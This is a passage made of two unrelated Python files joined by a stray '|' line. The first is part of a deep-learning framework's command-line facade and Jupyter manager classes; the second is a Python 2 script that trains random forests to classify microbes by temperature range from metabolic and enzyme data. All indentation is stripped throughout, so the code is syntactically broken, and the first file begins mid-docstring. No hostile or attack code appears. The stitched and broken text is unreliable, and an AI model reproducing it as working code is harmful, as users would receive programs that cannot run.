"""Clear any cached facade this application instance.
"""
if self._cached_facade.is_set():
self._cached_facade().deallocate()
self._cached_facade.clear()
def deallocate(self):
super().deallocate()
self._try_deallocate(self.dealloc_resources, recursive=True)
self._cached_facade.deallocate()
@dataclass
class FacadeInfoApplication(FacadeApplication):
"""Contains methods that provide information about the model via the facade.
"""
CLI_META = ActionCliManager.combine_meta(
FacadeApplication,
{'mnemonic_overrides': {'print_information': 'info'},
'option_overrides': {'info_item': {'long_name': 'item',
'short_name': 'i'},
'debug_value': {'long_name': 'execlevel',
'short_name': None}}})
def print_information(self, info_item: InfoItem = None):
"""Output facade data set, vectorizer and other configuration information.
:param info_item: what to print
"""
# see :class:`.FacadeApplicationFactory'
def write_batch():
for batch in it.islice(facade.batch_stash.values(), 2):
batch.write()
if not hasattr(self, '_no_op'):
with dealloc(self.create_facade()) as facade:
print(f'{facade.model_settings.model_name}:')
fn_map = \
{None: facade.write,
InfoItem.meta: facade.batch_metadata.write,
InfoItem.param: facade.executor.write_settings,
InfoItem.model: facade.executor.write_model,
InfoItem.config: facade.config.write,
InfoItem.batch: write_batch}
fn = fn_map.get(info_item)
if fn is None:
raise DeepLearnError(f'No such info item: {info_item}')
fn()
def debug(self, debug_value: int = None):
"""Debug the model.
:param debug_value: the executor debugging level
"""
debug_value = True if debug_value is None else debug_value
with dealloc(self.create_facade()) as facade:
facade.debug(debug_value)
@dataclass
class FacadeResultApplication(FacadeApplication):
"""Contains methods that dump previous results.
"""
CLI_META = ActionCliManager.combine_meta(
FacadeApplication,
{'mnemonic_overrides': {'result_summary': 'summary',
'result_ids': 'resids',
'metrics': 'results',
'majority_label_metrics': 'majlab',
'compare_results': 'cmpres'},
'option_overrides': {'include_validation': {'long_name': 'validation',
'short_name': None}}})
def result_summary(self, out_file: Path = None,
include_validation: bool = False):
"""Create a summary of all archived results.
:param out_file: the output path
:param validation: whether or not to include validation results
"""
if out_file is None:
out_file = Path('result-summary.csv')
with dealloc(self.create_facade()) as facade:
rm: ModelResultManager = facade.result_manager
self._enable_cli_logging(facade)
reporter = ModelResultReporter(rm)
reporter.include_validation = include_validation
reporter.dump(out_file)
def metrics(self, sort: str = 'wF1', res_id: str = None,
out_file: Path = None):
"""Write a spreadhseet of label performance metrics for a previously trained
and tested model.
:param sort_col: the column to sort results
:param res_id: the result ID or use the last if not given
:param out_file: the output path
"""
if out_file is None:
out_file = Path('metrics.csv')
with dealloc(self.create_facade()) as facade:
df = facade.get_predictions_factory(name=res_id).metrics_dataframe
df = df.sort_values(sort, ascending=False).reset_index(drop=True)
df.to_csv(out_file)
self._enable_cli_logging(facade)
logger.info(f'wrote: {out_file}')
def result_ids(self):
"""Show all archived result IDs."""
with dealloc(self.create_facade()) as facade:
rm: ModelResultManager = facade.result_manager
print('\n'.join(rm.results_stash.keys()))
def result(self, res_id: str = None):
"""Show the last results.
:param res_id: the result ID or use the last if not given
"""
with dealloc(self.create_facade()) as facade:
df_fac: PredictionsDataFrameFactory = \
facade.get_predictions_factory(name=res_id)
df_fac.result.write()
def majority_label_metrics(self, res_id: str = None):
"""Show majority label metrics of the test dataset using a previous result set.
:param res_id: the result ID or use the last if not given
"""
with dealloc(self.create_facade()) as facade:
pred_factory: PredictionsDataFrameFactory = \
facade.get_predictions_factory(name=res_id)
pred_factory.majority_label_metrics.write()
def compare_results(self, res_id_a: str, res_id_b: str):
"""Compare two previous archived result sets.
:param res_id_a: the first result ID to compare
:param res_id_b: the second result ID to compare
"""
with dealloc(self.create_facade()) as facade:
rm: ModelResultComparer = facade.result_manager
diff = ModelResultComparer(rm, res_id_a, res_id_b)
diff.write()
@dataclass
class FacadeBatchApplication(FacadeApplication):
"""Test, train and validate models.
"""
CLI_META = ActionCliManager.combine_meta(
FacadeApplication,
{'option_overrides':
{'clear_type': {'long_name': 'ctype',
'short_name': None},
'clear': {'short_name': None},
'split': {'short_name': None},
'limit': {'short_name': None}},
'mnemonic_overrides':
{'batch': {'option_includes': {'limit', 'clear_type', 'split'}}}})
def _write_batch_splits(self, facade: ModelFacade):
scont: SplitStashContainer = facade.batch_stash.split_stash_container
if hasattr(scont, 'split_container') and \
isinstance(scont.split_container, StratifiedStashSplitKeyContainer):
stash: StratifiedStashSplitKeyContainer = scont.split_container
stash.stratified_write = True
stash.write()
def batch(self, limit: int = None, clear_type: ClearType = ClearType.none,
split: bool = False):
"""Create batches if not already, print statistics on the dataset.
:param clear_type: what to delete to force recreate
:param limit: the number of batches to create
:param split: also write the stratified splits if available
"""
with dealloc(self.create_facade()) as facade:
self._enable_cli_logging(facade)
if clear_type == ClearType.batch:
logger.info('clearing batches')
facade.batch_stash.clear()
elif clear_type == ClearType.source:
facade.batch_stash.clear_all()
facade.batch_stash.clear()
facade.dataset_stash.write()
if split:
self._write_batch_splits(facade)
@dataclass
class FacadeModelApplication(FacadeApplication):
"""Test, train and validate models.
"""
CLI_META = ActionCliManager.combine_meta(
FacadeApplication,
{'option_overrides': {'use_progress_bar': {'long_name': 'progress',
'short_name': 'p'}},
'mnemonic_overrides': {'train_production': 'trainprod',
'early_stop': {'option_includes': {},
'name': 'stop'}}})
use_progress_bar: bool = field(default=False)
"""Display the progress bar."""
def create_facade(self) -> ModelFacade:
"""Create a new instance of the facade."""
facade = super().create_facade()
facade.progress_bar = self.use_progress_bar
facade.configure_cli_logging()
return facade
def train(self):
"""Train the model and dump the results, including a graph of the
train/validation loss.
"""
with dealloc(self.create_facade()) as facade:
facade.train()
facade.persist_result()
def test(self, model_path: Path = None):
"""Test an existing model the model and dump the results of the test.
:param model_path: the path to the model or use the last trained model
if not provided
"""
self.model_path = model_path
with dealloc(self.create_facade()) as facade:
facade.test()
def train_test(self):
"""Train, test the model, then dump the results with a graph.
"""
with dealloc(self.create_facade()) as facade:
facade.train()
facade.test()
facade.persist_result()
def train_production(self):
"""Train, test the model on train and test datasets, then dump the results with
a graph.
"""
with dealloc(self.create_facade()) as facade:
facade.train_production()
facade.test()
facade.persist_result()
def early_stop(self):
"""Stops the execution of training the model.
"""
with dealloc(self.create_facade()) as facade:
facade.stop_training()
class FacadePredictApplication(FacadeApplication):
"""An applicaiton that provides prediction funtionality.
"""
CLI_META = ActionCliManager.combine_meta(
FacadeApplication, {'mnemonic_overrides':
{'predictions': {'name': 'preds'}}})
def predictions(self, res_id: str = None, out_file: Path = None):
"""Write predictions to a CSV file.
:param res_id: the result ID or use the last if not given
:param out_file: the output path
"""
with dealloc(self.create_facade()) as facade:
if out_file is None:
out_file = Path(f'{facade.executor.model_name}.csv')
try:
df = facade.get_predictions(name=res_id)
except ModelError as e:
raise ApplicationError(
'Could not predict, probably need to train a model ' +
f'first: {e}') from e
df.to_csv(out_file)
self._enable_cli_logging(facade)
if logger.isEnabledFor(logging.INFO):
logger.info(f'wrote predictions: {out_file}')
@dataclass
class FacadeApplicationFactory(ApplicationFactory):
"""This is a utility class that creates instances of
:class:`.FacadeApplication`. It's only needed if you need to create a
facade without wanting invoke the command line attached to the
applications.
It does this by only invoking the first pass applications so all the
correct initialization happens before returning factory artifacts.
There mst be a :obj:`.FacadeApplication.facade_name` entry in the
configuration tied to an instance of :class:`.FacadeApplication`.
:see: :meth:`create_facade`
"""
def create_facade(self, args: List[str] = None,
app_args: Dict[str, Any] = None) -> ModelFacade:
"""Create the facade tied to the application without invoking the command line.
:param args: the (would be) command line arguments used to create the
application
:param app_args: the arguments to set on the the facade application
after it is created and before it creates the facade
"""
create_args = ['info']
if args is not None:
create_args.extend(args)
app: Application = self.create(create_args)
inv: Invokable = app.invoke_but_second_pass()[1]
fac_app: FacadeApplication = inv.instance
if app_args is not None:
for k, v in app_args.items():
setattr(fac_app, k, v)
return fac_app.create_facade()
@dataclass
class FacadeApplicationManager(Writable):
"""A very high level client interface making it easy to configure and run
models from an interactive environment such as a Python REPL or a Jupyter
notebook (see :class:`.JupyterManager`)
"""
cli_harness: CliHarness = field()
"""The CLI harness used to create the facade application."""
cli_args_fn: List[str] = field(default=lambda: [])
"""Creates the arguments used to create the facade from the application
factory.
"""
reset_torch: bool = field(default=True)
"""Reset random state for consistency for each new created facade."""
allocation_tracking: Union[bool, str] = field(default=False)
"""Whether or not to track resource/memory leaks. If set to ``stack``, the
stack traces of the unallocated objects will be printed. If set to
``counts`` only the counts will be printed. If set to ``True`` only the
unallocated objects without the stack will be printed.
"""
logger_name: str = field(default='notebook')
"""The name of the logger to use for logging in the notebook itself."""
default_logging_level: str = field(default='WARNING')
"""If set, then initialize the logging system using this as the default logging
level. This is the upper case logging name such as ``WARNING``.
"""
progress_bar_cols: int = field(default=120)
"""The number of columns to use for the progress bar."""
config_overwrites: Dict[str, Dict[str, str]] = field(default_factory=dict)
"""Clobbers any configuration set by :meth:`config` for those sections/options
set.
"""
def __post_init__(self):
if self.allocation_tracking:
Deallocatable.ALLOCATION_TRACKING = True
if self.logger_name is not None:
self.logger = logging.getLogger(self.logger_name)
else:
self.logger = logger
self._facade = None
def _create_facade(self, args: List[str] = None,
app_args: Dict[str, Any] = None) -> ModelFacade:
"""Create the facade tied to the application without invoking the command line.
:param args: the (would be) command line arguments used to create the
application
:param app_args: the arguments to set on the the facade application
after it is created and before it creates the facade
"""
create_args = ['info']
if args is not None:
create_args.extend(args)
fac_app: FacadeApplication = self.cli_harness.get_instance(create_args)
assert isinstance(fac_app, FacadeApplication)
if app_args is not None:
for k, v in app_args.items():
setattr(fac_app, k, v)
return fac_app.create_facade()
def cleanup(self, include_cuda: bool = True, quiet: bool = False):
"""Report memory leaks, run the Python garbage collector and optionally empty
the CUDA cache.
:param include_cuda: if ``True`` clear the GPU cache
:param quiet: do not report unallocated objects, regardless of the
setting of :obj:`allocation_tracking`
"""
if self.allocation_tracking and not quiet:
include_stack, only_counts = False, False
if self.allocation_tracking == 'stack':
include_stack, only_counts = True, False
elif self.allocation_tracking == 'counts':
include_stack, only_counts = False, True
include_stack = (self.allocation_tracking == 'stack')
Deallocatable._print_undeallocated(include_stack, only_counts)
self.deallocate()
Deallocatable._deallocate_all()
gc.collect()
if include_cuda:
# free up memory in the GPU
TorchConfig.empty_cache()
def deallocate(self):
"""Deallocate all resources in the CLI factory if it exists."""
if self._facade is not None:
if self.logger.isEnabledFor(logging.INFO):
self.logger.info('deallocating old factory')
self._facade.deallocate()
self._facade = None
def config(self, section: str, **kwargs):
"""Add overwriting configuration used when creating the facade.
:param section: the section to be overwritten (or added)
:param kwargs: the key/value pairs used as the section data to
overwrite
:see: :meth:`create_facade`
"""
if section not in self.config_overwrites:
self.config_overwrites[section] = {}
self.config_overwrites[section].update(kwargs)
def clear(self):
"""Clear all post create configuration set with :meth:`config`."""
self.config_overwrites.clear()
def create_facade(self, *args) -> ModelFacade:
"""Create and return a facade. This deallocates and cleans up state from any
previous facade creation as a side effect.
:param args: given to the :obj:`cli_args_fn` function to create
arguments passed to the CLI
"""
if len(self.config_overwrites) > 0:
dconf = DictionaryConfig(self.config_overwrites)
app_args = {'config_overwrites': dconf}
else:
app_args = None
self.deallocate()
# reclaim memory running GC and GPU cache clear
self.cleanup()
try:
# reset random state for consistency of each new test
if self.reset_torch:
TorchConfig.init()
# create a factory that instantiates Python objects
cli_args_fn = self.cli_args_fn(*args)
# create the facade used for this instance
self._facade: ModelFacade = self._create_facade(
cli_args_fn, app_args)
return self._facade
except Exception as e:
try:
# recover the best we can
self.cleanup(quiet=True)
self._facade = None
except Exception:
pass
raise DeepLearnError(f'Could not create facade: {e}') from e
@property
def facade(self) -> ModelFacade:
"""The current facade for this notebook instance.
:return: the existing facade, or that created by :meth:`create_facade`
if it doesn't already exist
"""
if self._facade is None:
self.create_facade()
self._facade.writer = None
return self._facade
def run(self, display_results: bool = True):
"""Train, test and optionally show results.
:param display_results: if ``True``, write and plot the results
"""
try:
facade = self.facade
facade.train()
facade.test()
if display_results:
facade.write_result()
facade.plot_result()
except Exception as e:
try:
facade = None
# recover the best we can
self.cleanup(quiet=True)
except Exception:
pass
raise DeepLearnError('Could not run the model') from e
def show_leaks(self, output: str = 'counts', fail: bool = True):
"""Show all resources/memory leaks in the current facade. First, this
deallocates the facade, then prints any lingering objects using
:class:`~zensols.persist.Deallocatable`.
**Important**: :obj:`allocation_tracking` must be set to ``True`` for
this to work.
:param output: one of ``stack``, ``counts``, or ``tensors``
:param fail: if ``True``, raise an exception if there are any
unallocated references found
"""
if self._facade is None:
raise DeepLearnError('No facade created yet')
if self.allocation_tracking:
self._facade.deallocate()
if output == 'counts':
Deallocatable._print_undeallocated(only_counts=True, fail=fail)
elif output == 'stack':
Deallocatable._print_undeallocated(include_stack=True, fail=fail)
elif output == 'tensors':
TorchConfig.write_in_memory_tensors()
else:
raise DeepLearnError(f'Unknown output type: {output}')
self._facade = None
def write(self, depth: int = 0, writer: TextIOBase = sys.stdout,
include_model=False, include_metadata=False,
include_settings=False, **kwargs):
self.facade.write(
depth, writer,
include_model=include_model,
include_metadata=include_metadata,
include_settings=include_settings,
**kwargs)
@dataclass
class JupyterManager(FacadeApplicationManager):
"""A facade application manager that provides additional convenience
functionality.
"""
reduce_logging: bool = field(default=False)
"""Whether to disable most information logging so the progress bar is more
prevalent.
"""
browser_width: int = field(default=95)
"""The width of the browser windows as a percentage."""
def __post_init__(self):
super().__post_init__()
if self.browser_width is not None:
self.set_browser_width(self.browser_width)
@staticmethod
def set_browser_width(width: int = 95):
"""Use the entire width of the browser to create more real estate.
:param width: the width as a percent (``[0, 100]``) to use as the width
in the notebook
"""
from IPython.core.display import display, HTML
html = f'<style>.container {{ width:{width}% !important; }}</style>'
display(HTML(html))
def _init_jupyter(self):
"""Initialize the a Jupyter notebook by configuring the logging system and
setting the progress bar.
"""
if self.reduce_logging:
logging.getLogger('zensols.deeplearn.model.executor.status').\
setLevel(logging.WARNING)
else:
log_level = None
if self.default_logging_level is not None:
log_level = getattr(logging, self.default_logging_level)
# set console based logging
self.facade.configure_jupyter(
log_level=log_level,
progress_bar_cols=self.progress_bar_cols)
def create_facade(self, *args) -> ModelFacade:
facade = super().create_facade(*args)
# initialize jupyter
self._init_jupyter()
return facade
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 6 14:19:32 2020
@author: adele
"""
import cPickle as cpk
from os.path import join as joinP
from collections import Counter
from copy import deepcopy
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import confusion_matrix, f1_score
import matplotlib.pyplot as plt
import seaborn as sns
from utils_general import train_test_proportions, get_pathways_from_nodes, \
is_enz
def from_CM_get_y(m, labels):
"""From confusion matrix, deduce fake y_true y_pred"""
y_true = []
y_pred = []
for tr, line in enumerate(m):
y_true += [labels[tr]] * np.sum(line)
for col, val in enumerate(line):
y_pred += [labels[col]] * val
return y_true, y_pred
def plot_confusion_matrix(cm, classes,
normalize=False,
cmap=plt.cm.YlGnBu):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
np.set_printoptions(precision=2)
fig, ax = plt.subplots()
im = ax.imshow(cm, interpolation='nearest', cmap=cmap)
ax.figure.colorbar(im, ax=ax)
# We want to show all ticks...
ax.set(xticks=np.arange(cm.shape[1]),
yticks=np.arange(cm.shape[0]),
# ... and label them with the respective list entries
xticklabels=classes, yticklabels=classes,
ylabel='True',
# fontsize=16,
xlabel='Predicted')
# Loop over data dimensions and create text annotations.
fmt = '.2f'
thresh = cm.max() / 2.
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
ax.text(j, i, format(cm[i, j], fmt),
ha="center", va="center", fontsize=14,
color="white" if cm[i, j] > thresh else "black")
plt.xlim(-0.5, len(np.unique(classes))-0.5)
plt.ylim(len(np.unique(classes))-0.5, -0.5)
plt.xlabel("Predicted", fontsize=16)
plt.ylabel('True', fontsize=16)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
plt.tight_layout()
return ax
def mask_kmer(i_list, kmer_action, *args):
"""
I invert values in k-mer to see effect on prediciton. 0 become 1 and 1 become 0.
Otherwise, put to 0 or to 1 all values.
Parameters
----------
i_list : list
list of column indexes to remove.
kmer_action : str
Among "invert", "zeros", "ones". Will invert values or put them to 0 or to 1.
*args :
List of X with columns to mask.
Returns
-------
list of modified arrays
"""
assert kmer_action in ["invert", "zeros", "ones"], "Invalid k-mer action."
masked_arrays = []
for X in args:
assert all([val in [0, 1] for val in np.unique(X)]), "Non 0/1 binary array"
if kmer_action == "invert":
X[:, i_list] = np.abs(X[:, i_list] - 1)
elif kmer_action == "zeros":
X[:, i_list] = 0
elif kmer_action == "ones":
X[:, i_list] = 1
masked_arrays.append(X)
return masked_arrays
def save_csv_pred(y, df, col_list, fname):
df_pred = df.loc[:, col_list]
df_pred["randomF_prediction"] = y
df_pred.to_csv(fname, index=False)
class RandomForestClassifierClass:
def __init__(self, matrix, classes, weights, ntrees, kwargs):
self.matrix = matrix
self.classes = classes
self.class_weights = weights
self.ntrees = ntrees
self.kwargs = kwargs
def train_test_validation(self):
self.data, self.data_v, self.y, self.y_v, _, _ = train_test_proportions(.9, self.matrix.T, self.classes)
self.X_train, self.X_test, self.y_tr, self.y_t, _, _ = train_test_proportions(.66, self.data, self.y)
def rf_model_fit(self):
self.clf = RandomForestClassifier(class_weight=self.class_weights,
n_estimators=self.ntrees, **self.kwargs)
self.clf.fit(self.X_train, self.y_tr)
def predict(self, data, y=False, text=""):
y_pred = self.clf.predict(data)
if np.any(y) != False:
print text, sum(y_pred == y)/float(len(y))
return y_pred
def predict_test(self, y=True):
if np.any(y) != False:
y = self.y_t
self.y_pred = self.predict(self.X_test, y, text="Accuracy testing dataset:")
return self.y_pred
def predict_valid(self, y=True):
if np.any(y) != False:
y = self.y_v
self.y_pred_v = self.predict(self.data_v, y, text="Accuracy validation dataset:")
return self.y_pred_v
def mask_analysis(self, step=50, brk=False, acc_print=True, plot=True):
"""
K-mer analysis, inverting matrix values in *step*-size sliding window, and plotting (and printing) the resulting
accuracy
step - sliding window size
brk - Defaults to False. Stop sliding when accuracy inferior to brk.
return accuracies of each mask
"""
if plot:
plt.figure(figsize=(10,7))
plt.axhline(sum(self.y_pred_v == self.y_v)/float(len(self.y_v)), c="r")
accs = []
for i in range(0, self.matrix.T.shape[1]):
i_list = [i+n for n in range(step) if i+n < self.matrix.T.shape[1]]
X_v_k = mask_kmer(i_list, "invert", deepcopy(self.data_v))[0]
y_pred2 = self.clf.predict(X_v_k)
if plot:
plt.scatter(i, sum(y_pred2 == self.y_v)/float(len(self.y_v)), c="k")
if acc_print:
print i, step, sum(y_pred2 == self.y_v)/float(len(self.y_v))
accs.append(sum(y_pred2 == self.y_v)/float(len(self.y_v)))
if brk and sum(y_pred2 == self.y_v)/float(len(self.y_v)) < brk:
print Counter([tuple(coupl) # Wrong class - correct one numbers
for coupl in np.vstack((y_pred2[y_pred2 != self.y_v],
self.y_t[y_pred2 != self.y_v])).T
])
break
if plot:
plt.ylabel("Accuracy")
plt.xlabel("Position of first compound in mask")
plt.title("Mask size: {}".format(step))
plt.plot()
return accs
if __name__ == '__main__':
backup_dir = "backup_cpkl/"
med_name = "PsychroMesoThermHyperMedium"
#The following files are generated by scope_kegg_prk.py
simplified_matrix = cpk.load(open(joinP(backup_dir, "simplified_matrix_scope{}_prk.cpk".format(med_name)), "rb"))
nodes_simplified = cpk.load(open(joinP(backup_dir, "simplified_nodes_scope{}_prk.cpk".format(med_name)), "rb"))
df_species = pd.read_csv("species_metadata.csv", index_col=0)
df_species.loc[df_species.sp_codes.isnull(), "sp_codes"] = "nan" # Otherwise interpreted as NaN
# =============================================================================
#
# TEMPERATURE CLASS PREDICTION
#
# =============================================================================
matrix_temp = simplified_matrix[:, df_species.temp_range_deduced.notnull()]
classes = df_species.temp_range_deduced[df_species.temp_range_deduced.notnull()].values
accuracy_v = []
gini = []
mat = []
mask_min50 = []
f1_scores_temp = []
depths = []
cv_n = 300
for cv in xrange(cv_n): #cross validation
print cv
# Random 300 mesophiles so as to balance classes: index of matrix without temp null values
no_meso = sorted(list(np.where(classes != "mesophilic")[0]) +
list(np.random.choice(np.where(classes == "mesophilic")[0],
300, replace=False)
))
matrix_T300 = matrix_temp[:, no_meso]
classesT300 = classes[no_meso]
tclass300RF = RandomForestClassifierClass(matrix=matrix_T300,
classes=classesT300,
weights={"mesophilic":300./782,
"thermophilic":188./782,
"hyperthermophilic":76./782,
"psychrophilic":218./782},
ntrees=1000,
kwargs={})
# Split dataset
tclass300RF.train_test_validation()
# Fit on train dataset
tclass300RF.rf_model_fit()
# Test dataset prediciton
tclass300RF.predict_test()
# True validation - independent testing set
tclass300RF.predict_valid()
accuracy_v.append(sum(tclass300RF.y_pred_v == tclass300RF.y_v) / float(len(tclass300RF.y_v)))
f1_scores_temp.append(
f1_score(tclass300RF.y_v, tclass300RF.y_pred_v,
labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"],
average="micro"))
#Real as lines, preds as cols
m = confusion_matrix(tclass300RF.y_v, tclass300RF.y_pred_v,
labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"],)
mat.append(m)
#Get depth
max_dpth = max([dectree.tree_.max_depth for dectree in tclass300RF.clf.estimators_])
depths.append(max_dpth)
# Feature importances
gini_50_nodes = nodes_simplified[np.argsort(tclass300RF.clf.feature_importances_)[::-1]][:50]
gini.append(gini_50_nodes)
print "Accuracy:", np.mean(accuracy_v), np.std(accuracy_v)
print "F1-score:", np.mean(f1_scores_temp), np.std(f1_scores_temp)
# Plot cross-validation boxplot of accuracies per class
m_diag = [np.diag(m) for m in mat]
plt.figure(figsize=(10, 7))
sns.boxplot(data=(np.array(m_diag) / np.sum(mat[0], axis=1).astype(float)),
palette=sns.color_palette(["#d82f00", "goldenrod", "lightgreen", "#41a5b7", ]))
plt.xticks(range(4), ["HT", "T", "M", "P"], fontsize=16)
plt.ylabel("Accuracy", fontsize=18)
plt.xlabel("Temperature class", fontsize=18)
plt.yticks(fontsize=16)
plt.ylim(0, 1.05)
# Mean matrix o
m_mean = deepcopy(mat[0])
for m in mat[1:]:
m_mean += m
print m_mean / float(cv_n)
norm = (m_mean / float(cv_n)).astype('float') / (m_mean / float(cv_n)).sum(axis=1)[:, np.newaxis]
plot_confusion_matrix(norm, ["HT", "T", "M", "P"],
normalize=False,
cmap=plt.cm.YlGnBu)
# Most important nodes for model prediction, and pathways to which they belong
c_gini = Counter(np.concatenate(gini)) #Counter of nodes all
c, pathways = get_pathways_from_nodes(c_gini.keys()) #pathways= equivalence node-pathways, c= counter of pathways in values of pathways dict (not weigthed by apparition of nodes)
pathways_g = [] #all nodes transformed by its equivalence
for n in np.concatenate(gini):
n = n.split("_")[0]
pathways_g += pathways[n]
c_all = Counter(np.array(pathways_g)[:, 1]) #Counter of pathways all (weighted by the repetitions of nodes)
c_mean = Counter({key: v / float(cv_n) for key, v in c_all.items()})
pathways_lists = []
c_std = {ky:0 for ky in c_mean.keys()}
for crssv in gini:
pathways_lists.append([])
for nod in crssv:
nod = nod.split("_")[0]
pathways_lists[-1] += [p[1] for p in pathways[nod]]
for pthway in c_mean.keys():
for crssv in pathways_lists:
c_cv = Counter(crssv)
c_std[pthway] += (c_cv[pthway] - c_mean[pthway])**2
for pthway in c_mean.keys():
c_std[pthway] = np.sqrt(c_std[pthway]/float(cv_n))
#Histogram index nodes per number of models
index_nodes = {ky:list(nodes_simplified).index(ky) for ky in c_gini.keys()}
c_gini_idx = {index_nodes[ky]:v for ky, v in c_gini.items()}
plt.figure(figsize=(10, 7))
plt.bar(range(len(c_gini_idx)), np.array(sorted(c_gini_idx.values(), reverse=True)) * 100./cv_n) #plots the number of model counts per union of 50 most important nodes for all models.
plt.xlabel("Nodes", fontsize=16)
plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.xlim(0, 177)
plt.tight_layout()
#Mean of tree max depths
print np.mean(depths)
#Species x 17 nodes amongst union of "50 most important nodes" present in 90% of models matrix
nods17 = ['1.1.1.38_0','1.1.1.38_1', '1.1.1.40_0', '1.1.1.40_1', '1.4.1.4', '1.8.1.7', '3.5.1.1', '4.3.1.1',
'4.3.3.6_1', '6.3.2.2', '6.3.2.3', '7.3.2.6', 'C00127', 'C00208', 'C00385', 'C00669', 'C20679']
mat_17 = np.genfromtxt("matrix_speciesX17impNodes.csv")
#add column for 1.1.1.38_0, same as 1.1.1.38_1
mat_17 = np.hstack((mat_17[:,0].reshape(5610, 1), mat_17))
HT_i = np.where(df_species.temp_range_deduced == "hyperthermophilic")[0]
T_i = np.where(df_species.temp_range_deduced == "thermophilic")[0]
M_i = np.where(df_species.temp_range_deduced == "mesophilic")[0]
P_i = np.where(df_species.temp_range_deduced == "psychrophilic")[0]
sort_for_fig = np.argsort(np.sum(mat_17[HT_i, :], axis=0)/float(len(HT_i)) +
np.sum(mat_17[T_i, :], axis=0)/float(len(T_i)) -
np.sum(mat_17[M_i, :], axis=0)/float(len(M_i)) -
np.sum(mat_17[P_i, :], axis=0)/float(len(P_i))
)[::-1]
x = np.arange(17) # the label locations
width = 0.8 # the width of the bars
fig, ax = plt.subplots()
rects1 = ax.bar(x - width/4. - width/8., (np.sum(mat_17[HT_i, :], axis=0)/float(len(HT_i)))[sort_for_fig], width/4., label="HT", color="#d82f00")
rects2 = ax.bar(x - width/8., (np.sum(mat_17[T_i, :], axis=0)/float(len(T_i)))[sort_for_fig], width/4., label='T', color="goldenrod")
rects2 = ax.bar(x + width/8., (np.sum(mat_17[M_i, :], axis=0)/float(len(M_i)))[sort_for_fig], width/4., label='M', color="lightgreen")
rects2 = ax.bar(x + width/4. + width/8., (np.sum(mat_17[P_i, :], axis=0)/float(len(P_i)))[sort_for_fig], width/4., label='P', color="#41a5b7")
ax.set_xticks(x)
print list(np.array(nods17)[sort_for_fig]) #Tick labels manually modified because _0 was after _1
ax.set_xticklabels(['4.3.3.6_1', '7.3.2.6', 'C20679', '1.1.1.38_0', '1.1.1.38_1',
'4.3.1.1', '3.5.1.1', '1.4.1.4', 'C00208', '6.3.2.3', '1.8.1.7',
'C00385', '1.1.1.40_0', '1.1.1.40_1', '6.3.2.2', 'C00669', 'C00127'], fontsize=12)
ax.set_yticklabels(["0", "0.2", "0.4", "0.6", "0.8"], fontsize=12)
ax.legend(fontsize=14)
ax.set_ylabel("Proportion of species", fontsize=16)
ax.set_xlabel("17 common important nodes", fontsize=16)
fig.tight_layout()
# =============================================================================
# DIFFERENTIAL GENOMICS RF TCLASS
# =============================================================================
all_nodes = cpk.load(open("backup_cpkl/all_nodes_union_prk.cpk", "rb"))
enzs_only_db = np.array(sorted([n for n in all_nodes if is_enz(n)]))
indx_to_remove = [i for i, enz in enumerate(enzs_only_db) if not enz.endswith("_0") and not len(enz.split("_")) == 1]
gene_mat = np.load("enzs_per_sp.npy") #sp x enzymes
gene_mat_temp_doubles = gene_mat[df_species.temp_range_deduced.notnull(), :].T
# DIFFERENTIAL GENOMICS FOR GENES WITH ENZYMES (no _1, _2, ...)
# Our graphs consider reactions (appended by _0, _1 if multiple reactions per enzyme).
# Here, enzymes are considered, so when duplicates (_1, _2) are removed
gene_mat_temp_nodoubles = np.delete(gene_mat_temp_doubles, indx_to_remove, 0)
enzs_only_nodouble = enzs_only_db[[i for i in range(len(enzs_only_db)) if i not in indx_to_remove]]
gene_mat_temp_ = gene_mat_temp_nodoubles
enzs_only = enzs_only_nodouble
accuracy_v_DG = []
gini_DG = []
mat_DG = []
f1_scores_DG = []
cv_n = 300
depths_DG = []
if300_DG = True
for cv in xrange(cv_n): #cross validation
print cv
if if300_DG:
no_meso = sorted(list(np.where(classes != "mesophilic")[0]) +
list(np.random.choice(np.where(classes == "mesophilic")[0],
300, replace=False)
))
gene_mat_temp = gene_mat_temp_[:, no_meso]
classes_DG = classes[no_meso]
w = {"mesophilic":300./782,
"thermophilic":188./782,
"hyperthermophilic":76./782,
"psychrophilic":218./782}
else:
classes_DG = classes
w = {"mesophilic":2910./3392,
"thermophilic":188./3392,
"hyperthermophilic":76./3392,
"psychrophilic":218./3392}
gene_mat_temp = gene_mat_temp_
tempclassRF_DG = RandomForestClassifierClass(matrix=gene_mat_temp,
classes=classes_DG,
weights=w,
ntrees=1000,
kwargs={})
# Split dataset
tempclassRF_DG.train_test_validation()
# Fit on train dataset
tempclassRF_DG.rf_model_fit()
# Test dataset prediciton
tempclassRF_DG.predict_test()
# True validation - independent testing set
tempclassRF_DG.predict_valid()
accuracy_v_DG.append(sum(tempclassRF_DG.y_pred_v == tempclassRF_DG.y_v)/float(len(tempclassRF_DG.y_v)))
f1_scores_DG.append(
f1_score(tempclassRF_DG.y_v, tempclassRF_DG.y_pred_v,
labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"],
average="micro"))
#Real as lines, preds as cols
m = confusion_matrix(tempclassRF_DG.y_v, tempclassRF_DG.y_pred_v, labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"])
mat_DG.append(m)
# Feature importances
gini_50_nodes = enzs_only[np.argsort(tempclassRF_DG.clf.feature_importances_)[::-1]][:50]
gini_DG.append(gini_50_nodes)
# Get depth
max_dpth = max([dectree.tree_.max_depth for dectree in tempclassRF_DG.clf.estimators_])
depths_DG.append(max_dpth)
# Plot cross-validation boxplot of accuracies per class
m_diag_DG = [np.diag(m) for m in mat_DG]
plt.figure(figsize=(10, 7))
sns.boxplot(data=(np.array(m_diag_DG) / np.sum(mat_DG[0], axis=1).astype(float)),
palette=sns.color_palette(["#d82f00", "goldenrod", "lightgreen", "#41a5b7", ]))
plt.xticks(range(4), ["HT", "T", "M", "P"], fontsize=16)
plt.ylabel("Accuracy", fontsize=18)
plt.xlabel("Temperature class", fontsize=18)
plt.yticks(fontsize=16)
